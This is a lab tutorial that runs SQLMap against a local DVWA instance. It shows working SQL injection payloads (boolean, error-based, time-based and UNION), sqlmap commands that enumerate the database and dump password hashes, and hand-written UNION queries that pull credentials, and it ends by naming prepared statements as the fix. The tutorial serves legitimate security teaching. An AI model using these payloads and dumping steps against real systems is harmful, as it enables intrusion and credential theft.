Basic SQLMap usage
This walkthrough uses DVWA as the SQL injection target.
(It assumes DVWA is already set up and SQLMap is installed and configured.)
1. Start phpstudy and open 127.0.0.1/dvwa in the browser.
At the login page use the default credentials: username admin, password password.
Under DVWA Security set Security Level to
Low and click Submit.
2. Capture the request with Burp and find the packet that carries the parameter.
Enter admin in the User ID field and click Submit; in the captured traffic locate the GET request to /dvwa/vulnerabilities/sqli/ that contains the id parameter (id=admin&Submit=Submit).
Select the whole raw request, paste it into a new .txt file, and append * directly after the value of id= (id=admin*) so that SQLMap tests only that parameter. Keep the Cookie header (PHPSESSID and security=low) in the file: without a logged-in session DVWA redirects to the login page and SQLMap would be testing that page instead of the vulnerable one.
3. Run SQLMap from cmd.
In cmd type sqlmap.py -r, drag the new .txt file into the window (this pastes its full path), and press Enter. SQLMap asks three questions; pressing Enter accepts the default Y for each:
custom injection marker ('*') found in option '-u'. Do you want to process it? [Y/n/q]
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
Parameter: #1* (URI)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' OR NOT 4783=4783#&Submit=Submit
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 8193 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8193=8193,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- atoK&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' AND (SELECT 3212 FROM (SELECT(SLEEP(5)))lMml)-- vPSI&Submit=Submit
Type: UNION query
Title: MySQL UNION query (NULL) - 2 columns
Payload: http://127.0.0.1:80/dvwa/vulnerabilities/sqli/?id=admin' UNION ALL SELECT CONCAT(0x7162787a71,0x6b75487261416a52637749597351466f57566a62706b4d6a764e537172556f736d6176484c775055,0x717a7a7871),NULL#&Submit=Submit
This shows the id parameter is injectable by four techniques (boolean-based blind, error-based, time-based blind and UNION query). Any of them can be used for the steps below; sqlmap picks the most efficient one available on its own (UNION first, falling back to error-based and then to blind inference).
4. Enumerate the database with the same request file:
- sqlmap.py -r C:\Users\王\Desktop\简单测试.txt --dbs
  lists the databases on the server
- sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa --tables
  lists the two tables in the dvwa database
- sqlmap.py -r C:\Users\王\Desktop\简单测试.txt -D dvwa -T users --columns
  lists the columns of the users table
- sqlmap.py -r "C:\Users\王\Desktop\新建文本文档 (2).txt" -D dvwa -T users -C user,user_id,password --dump
  dumps the accounts and password hashes (straight ASCII double quotes are required around this path because it contains a space; curly quotes are not recognised by cmd)
DVWA stores passwords as unsalted MD5 hashes, which cannot be "decoded": look them up in a hash database or crack them with a dictionary. sqlmap offers to do this itself when --dump finishes, asking whether to run a dictionary attack against the recognised hashes.
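As an added example (not part of the original walkthrough and not sqlmap's or DVWA's own code), the SQL that DVWA's low-level page actually executes for each payload sqlmap reported above, followed by hand-written UNION queries equivalent to the --dbs / --tables / --columns / --dump steps. It assumes DVWA's low-level query `SELECT first_name, last_name FROM users WHERE user_id = '$id';` and a MySQL backend; the enumeration queries are a simplified illustration of what sqlmap does (its real requests also wrap values in delimiter strings and may use GROUP_CONCAT or LIMIT):

```sql
-- DVWA "low" builds the query by string concatenation (sqli/source/low.php):
--   $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
-- Each payload sqlmap reported is shown below as the SQL the server runs,
-- with the signal sqlmap reads from the response.

-- 1. boolean-based blind:  id=admin' OR NOT 4783=4783#
--    NOT 4783=4783 is FALSE, so no row is returned. sqlmap also sends the TRUE
--    form (e.g. OR NOT 4783=4784), which returns every user; the two pages
--    differ, so the parameter is injectable. '#' comments out the trailing ';
SELECT first_name, last_name FROM users WHERE user_id = 'admin' OR NOT 4783=4783#';

-- 2. error-based:  0x7162787a71 = 'qbxzq' and 0x717a7a7871 = 'qzzxq' are
--    sqlmap's delimiters. FLOOR(RAND(0)*2) combined with GROUP BY raises the
--    classic "Duplicate entry 'qbxzq1qzzxq1' for key 'group_key'" error, and
--    DVWA low prints mysqli_error(), so whatever replaces ELT(8193=8193,1)
--    (a later request puts e.g. a SELECT of a password hash there) is leaked
--    between the delimiters.
SELECT first_name, last_name FROM users WHERE user_id = 'admin' AND (SELECT 8193 FROM(SELECT COUNT(*),CONCAT(0x7162787a71,(SELECT (ELT(8193=8193,1))),0x717a7a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- atoK';

-- 3. time-based blind: the page content does not change; sqlmap measures the
--    ~5 s delay introduced by SLEEP(5) and compares it with a normal request.
SELECT first_name, last_name FROM users WHERE user_id = 'admin' AND (SELECT 3212 FROM (SELECT(SLEEP(5)))lMml)-- vPSI';

-- 4. UNION query: the original SELECT has two columns, so a two-column UNION
--    with the delimited random string in column 1 shows up in the page where
--    first_name is printed.
SELECT first_name, last_name FROM users WHERE user_id = 'admin' UNION ALL SELECT CONCAT(0x7162787a71,0x6b75487261416a52637749597351466f57566a62706b4d6a764e537172556f736d6176484c775055,0x717a7a7871),NULL#';

-- Once UNION works, enumeration is just UNION queries against
-- information_schema and the target table (DVWA low loops over every row
-- of the result, so all values are printed). Hand-written equivalents of
-- the sqlmap options, each sent as id=admin' UNION ALL SELECT <expr>,NULL#

-- --dbs
SELECT first_name, last_name FROM users WHERE user_id = 'admin'
  UNION ALL SELECT schema_name, NULL FROM information_schema.schemata#';

-- -D dvwa --tables
SELECT first_name, last_name FROM users WHERE user_id = 'admin'
  UNION ALL SELECT table_name, NULL FROM information_schema.tables WHERE table_schema = 'dvwa'#';

-- -D dvwa -T users --columns
SELECT first_name, last_name FROM users WHERE user_id = 'admin'
  UNION ALL SELECT column_name, NULL FROM information_schema.columns WHERE table_schema = 'dvwa' AND table_name = 'users'#';

-- -D dvwa -T users -C user,user_id,password --dump  (0x3a is ':')
SELECT first_name, last_name FROM users WHERE user_id = 'admin'
  UNION ALL SELECT CONCAT(`user`, 0x3a, user_id, 0x3a, `password`), NULL FROM dvwa.users#';

-- None of these payloads changes the query structure once the id value is
-- bound as a parameter instead of concatenated; DVWA's "impossible" level does
-- exactly that with a prepared statement and PDO::PARAM_INT for :id.
```

Running the numbered queries directly against the dvwa database in a MySQL client reproduces each signal (empty result, duplicate-entry error, 5 s delay, extra row), which is a quick way to confirm what sqlmap is reporting before trusting a result.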
OVER